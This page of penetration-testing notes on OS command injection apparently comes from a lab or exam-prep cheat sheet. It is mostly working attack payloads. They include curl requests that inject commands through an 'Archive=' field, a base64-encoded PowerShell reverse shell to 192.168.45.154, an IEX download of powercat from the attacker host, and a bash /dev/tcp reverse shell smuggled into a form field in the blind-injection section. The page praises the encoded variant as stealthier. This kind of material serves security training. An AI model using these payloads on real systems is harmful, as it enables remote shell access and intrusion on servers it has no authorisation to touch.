OS Command Injection

It allows an attacker to run arbitrary commands on a web server's operating system.

Testing for OS Command Injection example

# Below is an example of a specific scenario.
# Visit the page at: 
http://192.168.209.189:8000/
# You will see that we are allowed to run the 'git clone repo_url' command.

# For tring, Run any git clone command
git clone https://github.com/gouravkhator/temp-git.git
# Intercept the request using burp suite.
# See if your request worked successfully or not.

# In my case i am seeing that value is passed using variable named "Archive="
# We can experiment using burp suite or curl.
# I know how to use burp or i will use curl command.

# Let's test if we can run whoami command or not.
curl -X POST --data 'Archive=whoami' http://192.168.209.189:8000/archive
# Command is formed using data in request.

# Output:
Command Injection detected. Aborting...%!(EXTRA string=whoami) 
# Looks like not working.

# Second try
curl -X POST --data 'Archive=git' http://192.168.209.189:8000/archive
# This gave error msg that error occured with execution.  Meaning command did execute.

# third try
curl -X POST --data 'Archive=git version' http://192.168.209.189:8000/archive
# worked and showed below output.
Repository successfully cloned with command: git version and output: git version 2.36.1.windows.1

# Forth try.
# Execute other command by ending current command with semicolon.
curl -X POST --data 'Archive=git%3Bwhoami' http://192.168.209.189:8000/archive
# this worked and printed output at the end.

Checking which is underlying OS.

# We can use below command to check the underlying Shell is powershell or cmd

"(dir 2>&1 *`|echo CMD);&<# rem #>echo PowerShell"

# Add command to curl command with encoded text using below website.
curl -X POST --data 'Archive=git%3B%28dir%202%3E%261%20%2A%60%7Cecho%20CMD%29%3B%26%3C%23%20rem%20%23%3Eecho%20PowerShell' http://192.168.209.189:8000/archive

# Great !! We came to know that underlying system is windows using powershell.

# Generate powershell base64 shell code and get the shell.
wget https://gist.githubusercontent.com/tothi/ab288fb523a4b32b51a53e542d40fe58/raw/40ade3fb5e3665b82310c08d3659712
3c2e75ab4/mkpsrevshell.py 

python3 mkpsrevshell.py 192.168.45.154 80
sudo rlwrap nc -lnvp 80


curl -X POST --data 'Archive=git%3Bpowershell%20-e%20JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQA5ADIALgAxADYAOAAuADQANQAuADEANQA0ACIALAA4ADAAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAPQAgACQAcwBlAG4AZABiAGEAYwBrACAAKwAgACIAUABTACAAIgAgACsAIAAoAHAAdwBkACkALgBQAGEAdABoACAAKwAgACIAPgAgACIAOwAkAHMAZQBuAGQAYgB5AHQAZQAgAD0AIAAoAFsAdABlAHgAdAAuAGUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkAKQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAcwBlAG4AZABiAGEAYwBrADIAKQA7ACQAcwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAHMAZQBuAGQAYgB5AHQAZQAsADAALAAkAHMAZQBuAGQAYgB5AHQAZQAuAEwAZQBuAGcAdABoACkAOwAkAHMAdAByAGUAYQBtAC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkA' http://192.168.209.189:8000/archive

# Great Got the shell.

URL Encode and Decode - OnlineURL Encode

# Using powercat to get the shell.
python3 -m http.server 80 -d /usr/share/windows-resources/powercat/
sudo rlwrap nc -lnvp 4444

curl -X POST --data 'Archive=git%3BIEX%20(New-Object%20System.Net.Webclient).DownloadString(%22http%3A%2F%2F192.168.45.154%2Fpowercat.ps1%22)%3Bpowercat%20-c%20192.168.45.154%20-p%204444%20-e%20powershell' http://192.168.209.189:8000/archive

# Got the shell.

Using Both methods that is Powercat Reverse Shell and Encoded PowerShell Command we got the shell but Encoded PowerShell Command is a stealthier approach and also minimizes dependencies.

Blind Command Injection

Sometimes we don't get output for commands run by us. But it does run internally.

# Belwo is one of the example:
# Payload:
username=&password=&ffa=test%22%26%26whoami%22

# Original version:
username=&password=&ffa=test"&&whoami"

Vulnerable Function

The back-end uses a vulnerable function (e.g., popen(), eval()) that allows appending additional shell commands via user input.
Example injection: test%22%26%26whoami%22 (which is effectively test" && whoami").

Why Output Is Not Shown

The function might not return stdout to the web response, so you don’t see the command's output.
You might only see errors (stderr), which explains why there’s an error message but no result from whoami.

Trial & Error

Different payloads (; whoami, | whoami, backticks, etc.) might be needed due to filtering or shell differences.
Escaping or encoding techniques may be necessary if certain characters get stripped or sanitized.

# You can get the shell from this.
username=&password=&ffa=test%22%26%26bash%20-c%20%22bash%20-i%20%3e%26%20%2fdev%2ftcp%2f192.168.45.151%2f443%200%3e%261%22%22

# Original:
username=&password=&ffa=test"&&bash -c "bash -i >& /dev/tcp/192.168.45.151/443 0>&1""

PreviousFile Upload NextPhishing for Access

Last updated 11 months ago